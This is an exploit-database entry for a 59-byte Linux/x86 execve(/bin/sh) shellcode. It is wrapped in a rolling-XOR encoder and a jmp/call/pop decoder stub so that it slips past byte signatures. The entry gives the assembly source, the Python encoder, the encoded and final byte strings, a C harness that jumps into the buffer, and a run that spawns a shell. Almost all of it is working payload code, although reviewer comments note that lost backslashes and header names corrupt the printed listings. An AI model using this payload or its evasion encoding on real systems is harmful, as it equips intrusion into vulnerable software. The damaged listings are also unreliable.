
Multiple keys XOR Encoder / Decoder execve(/bin/sh) Shellcode (59 bytes)



# Title: Linux/x86 - Multiple keys XOR Encoder / Decoder execve(/bin/sh) Shellcode (59 bytes)
# Author: Xavi Beltran
# Date: 05/05/2019
# Contact: xavibeltran@protonmail.com
# Purpose: spawn /bin/sh shell
# Tested On: Ubuntu 3.5.0-17-generic
# Arch: x86
# Size: 59 bytes

############################################## sh.nasm ###############################################
; sh.nasm: the plain (unencoded) 25-byte payload that the rest of this page wraps.
; Target: Linux, 32-bit x86, NASM (Intel) syntax, system call through int 0x80.
; Effect: execve("/bin//sh", argv, envp) with argv = { path, NULL } and envp
;         pointing at a NULL word.
; At the int 0x80: eax = 11 (execve), ebx = path, ecx = argv, edx = envp.
; Everything is built on the stack, so the code needs no data section and no
; fixed addresses. The byte listing that follows contains no 0x00 byte.
; Detection note: the two pushed immediates and the `mov al, 11` / `int 0x80`
; tail are constants, so this plain form matches simple byte signatures.
global _start			
section .text
_start:
	xor eax, eax		; eax = 0 without encoding a zero byte
	push eax		; NUL terminator for the path string
	push 0x68732f2f		; "//sh" (little-endian); the doubled '/' pads to 4 bytes
	push 0x6e69622f		; "/bin"  -> stack now holds "/bin//sh\0"
	mov ebx, esp		; ebx = pointer to the path
	push eax		; NULL word: terminates argv and serves as the empty envp
	mov edx, esp		; edx = envp (points at that NULL word)
	push ebx		; argv[0] = path
	mov ecx, esp		; ecx = argv = { path, NULL }
	mov al, 11		; syscall number 11 = execve on Linux i386; upper eax bits are still 0
	int 0x80		; enter the kernel; on success this does not return


###################################### original shellcode #############################################
x31xc0x50x68x2fx2fx73x68x68x2fx62x69x6ex89xe3x50x89xe2x53x89xe1xb0x0bxcdx80


#################################  encoder-xor-multiple-keys.py  ######################################
#!/usr/bin/python
# Author: Xavi Beltran
# Date: 05/05/2019

# Rolling-XOR encoder (Python 2: note the print statements).
# Each payload byte is XORed with a counter that cycles 1, 2, ..., 10, 1, 2, ...
# The key sequence is fixed and does not depend on the payload, so the encoded
# output is as constant as the input: this is obfuscation, not encryption, and
# the encoded bytes can be signatured just like the plain ones.
#
# NOTE(review): as printed on this page the literal below contains no
# backslashes, so it is plain ASCII text ("x31xc0...") rather than 25 escaped
# bytes. The "Len: 25" in the transcript further down implies the original
# used \x escapes that were lost when the page was rendered.
shellcode = ("x31xc0x50x68x2fx2fx73x68x68x2fx62x69x6ex89xe3x50x89xe2x53x89xe1xb0x0bxcdx80")

# encoded  : output in string-escape form, for pasting into a C string literal
# encoded2 : the same bytes as a comma-separated 0x.. list, for a NASM `db` line
encoded = ""
encoded2 = ""

print 'Encoded shellcode ...'

# i is the current XOR key; it starts at 1 and is never 0, so no byte is left unchanged by design
i = 1
for x in bytearray(shellcode) :

	# wrap the key back to 1 after 10 has been used (keys are 1..10)
	if  i == 11:
		i = 1
	y = x^i
	# NOTE(review): presumably '\\x' in the original; the backslash looks lost here too
	encoded += 'x'
	encoded += '%02x' % y

	encoded2 += '0x'
	encoded2 += '%02x,' %y
	
	# advance the key for the next byte
	i = i + 0x01

print encoded

print encoded2

# number of payload bytes processed; the decoder's loop count must match this value
print 'Len: %d' % len(bytearray(shellcode))


######################################### Encoded Shellcode  ###############################################

socket@ubuntu:~/Assesments/4$ python encoder-xor-multiple-keys.py 
Encoded shellcode ...
x30xc2x53x6cx2ax29x74x60x61x25x63x6bx6dx8dxe6x56x8exeax5ax83xe0xb2x08xc9x85
0x30,0xc2,0x53,0x6c,0x2a,0x29,0x74,0x60,0x61,0x25,0x63,0x6b,0x6d,0x8d,0xe6,0x56,0x8e,0xea,0x5a,0x83,0xe0,0xb2,0x08,0xc9,0x85,
Len: 25


#################################### decoder-xor-multiple-keys.nasm  ###############################################

; Filename: xor-decoder-multiple-keys.nasm
; Author:  Xavi Beltran
; Date: 05/05/2019

; Decoder stub for the rolling-XOR encoding produced by the Python script above.
; Target: Linux, 32-bit x86, NASM (Intel) syntax.
; Layout: 34 bytes of stub followed by the 25 encoded payload bytes (59 total,
;         matching the "final shellcode" listing below).
; Registers: dl  = current XOR key, cycles 1..10 (same sequence as the encoder)
;            esi = pointer to the next encoded byte
;            ecx = bytes left to decode (25)
; The payload address is found with the jmp/call/pop pattern: `call decoder`
; pushes the address of the byte after it (the Shellcode label) and `pop esi`
; picks it up, so no absolute address is needed.
; Review notes:
;  - `xor byte [esi], dl` rewrites the bytes at Shellcode in place, and that
;    label sits in section .text here. The stub therefore only runs from memory
;    that is both writable and executable; a W^X / NX policy stops it.
;  - The stub bytes and the key sequence are constants, so both the stub and
;    the encoded payload remain matchable by a static signature.
global _start			

section .text
_start:

	xor edx, edx		; clear edx so that dl can be used as the key register
	mov dl, 1		; first key value is 1
	jmp short call_decoder	; jump forward to the call that yields the payload address

decoder:
	pop esi			; esi = return address pushed by the call = address of Shellcode
	xor ecx, ecx
	mov cl, 25		; loop count = payload length ("Len: 25" from the encoder)


decode:
	cmp dl, 0x0b		; key ran past 10?
	jz xor_counter		; yes: reset it to 1 (ecx and esi are untouched, so no byte is skipped)
	xor byte [esi], dl	; decode one byte in place
	inc esi			; next encoded byte
	inc dl			; next key value
	loop decode		; ecx -= 1; repeat while ecx != 0

	jmp short Shellcode	; all 25 bytes decoded: transfer control to the decoded payload

xor_counter:
	mov dl, 1		; wrap the key back to 1
	jmp decode		; re-enter the loop at the comparison, same byte

call_decoder:

	call decoder		; pushes the address of Shellcode, then runs the decoder
	; the 25 encoded bytes, identical to the encoder's 0x.. output above
	Shellcode: db 0x30,0xc2,0x53,0x6c,0x2a,0x29,0x74,0x60,0x61,0x25,0x63,0x6b,0x6d,0x8d,0xe6,0x56,0x8e,0xea,0x5a,0x83,0xe0,0xb2,0x08,0xc9,0x85


############################################### final shellcode ################################################

socket@ubuntu:~/Assesments/4$ ./objdump_parser.sh decoder-xor-multiple-keys
"x31xd2xb2x01xebx17x5ex31xc9xb1x19x80xfax0bx74x09x30x16x46xfexc2xe2xf4xebx09xb2x01xebxeexe8xe4xffxffxffx30xc2x53x6cx2ax29x74x60x61x25x63x6bx6dx8dxe6x56x8exeax5ax83xe0xb2x08xc9x85"
socket@ubuntu:~/Assesments/4$ ./shellcode 
Shellcode Length:  59
$ whoami
socket

socket@ubuntu:~/Assesments/4$ cat shellcode.c 
#include
#include

/*
 * Test harness: stores the 59-byte blob (34-byte decoder stub + 25 encoded
 * bytes, as printed by objdump_parser.sh above) in a global array and calls it.
 *
 * NOTE(review): this copy of the listing is damaged. The two #include lines
 * above have lost their header names (printf and strlen are the only library
 * calls used), and the string literals have lost their backslashes, so code[]
 * as printed is ASCII text rather than 59 escaped bytes.
 */
unsigned char code[] = 
"x31xd2xb2x01xebx17x5ex31xc9xb1x19x80xfax0bx74x09x30x16x46xfexc2xe2xf4xebx09xb2x01xebxeexe8xe4xffxffxffx30xc2x53x6cx2ax29x74x60x61x25x63x6bx6dx8dxe6x56x8exeax5ax83xe0xb2x08xc9x85";

/* Implicit-int main: pre-C99 style; no value is returned. */
main()
{

	/*
	 * strlen() gives the blob length only because the listed bytes contain
	 * no 0x00. "%dn" is presumably "%d\n" with the backslash lost. strlen()
	 * returns size_t, which %d does not match.
	 */
	printf("Shellcode Length:  %dn", strlen(code));

	/* Reinterpret the data array as a function taking no arguments. */
	int (*ret)() = (int(*)())code;

	/*
	 * Jumps into code[]. The array lives in writable data, and the decoder
	 * stub also writes to it, so this works only where that memory is
	 * executable. NOTE(review): build flags are not shown on the page; with
	 * non-executable data pages (NX) this call faults instead of running.
	 */
	ret();

}
            





https://www.exploit-db.com/exploits/46800
